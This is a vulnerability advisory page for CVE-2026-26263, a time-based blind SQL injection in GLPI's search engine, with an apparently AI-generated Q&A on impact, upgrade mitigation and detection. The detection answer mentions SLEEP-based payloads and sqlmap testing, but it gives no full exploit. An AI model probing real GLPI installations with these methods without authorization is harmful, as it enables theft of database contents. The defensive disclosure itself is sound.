CVE-2026-26263
Blind SQL Injection in GLPI Search Engine Allows Data Exposure
Publication date: 2026-04-06
Last updated on: 2026-04-07
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| glpi-project | glpi | From 11.0.0 (inc) to 11.0.6 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-89 | The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-26263 is a high-severity unauthenticated time-based blind SQL injection vulnerability in the Search engine component of GLPI, an open-source IT asset management software.
This vulnerability affects GLPI versions from 11.0.0 up to but not including 11.0.6 and allows an attacker to execute arbitrary SQL commands without any authentication.
The issue arises because GLPI constructs SQL queries using user-supplied input without properly sanitizing or escaping special SQL syntax elements, enabling attackers to manipulate the SQL commands executed by the backend database.
How can this vulnerability impact me? :
This vulnerability can have a high impact on confidentiality, integrity, and availability of the affected system.
- Confidentiality: Unauthorized attackers can access sensitive data stored in the database.
- Integrity: Attackers can modify or corrupt data by executing arbitrary SQL commands.
- Availability: The system's availability can be disrupted, potentially causing service outages.
Since no authentication or user interaction is required, the vulnerability can be exploited remotely over the network, increasing the risk.
What immediate steps should I take to mitigate this vulnerability?
The primary mitigation step is to upgrade GLPI to version 11.0.6 or later, where this vulnerability is fixed.
As a workaround before upgrading, you can disable anonymous access to the FAQ, which limits exploitation to authenticated users only.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability allows an unauthenticated attacker to execute arbitrary SQL commands, potentially compromising the confidentiality, integrity, and availability of the system.
Such unauthorized access and potential data compromise could lead to violations of data protection regulations like GDPR and HIPAA, which require safeguarding personal and sensitive information against unauthorized access and breaches.
Therefore, if exploited, this vulnerability could negatively impact compliance with these common standards and regulations by exposing sensitive data or disrupting system availability.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
The vulnerability is a time-based blind SQL injection in the Search engine component of GLPI versions 11.0.0 to before 11.0.6. Detection typically involves sending specially crafted search queries that include SQL injection payloads and observing response delays or anomalies indicating SQL execution.
Since this is a time-based blind SQL injection, one common detection method is to inject payloads that cause a delay in the database response if the injection is successful. For example, sending search requests with payloads that include SQL commands like 'SLEEP(5)' or equivalent can help detect the vulnerability by measuring response times.
Specific commands or tools to detect this vulnerability are not provided in the available resources. However, penetration testing tools such as sqlmap can be used to test for time-based blind SQL injection by targeting the GLPI Search engine endpoint with appropriate parameters.
Mitigation is to upgrade GLPI to version 11.0.6 or later. As a temporary workaround, disabling anonymous access to the FAQ limits exploitation to authenticated users only.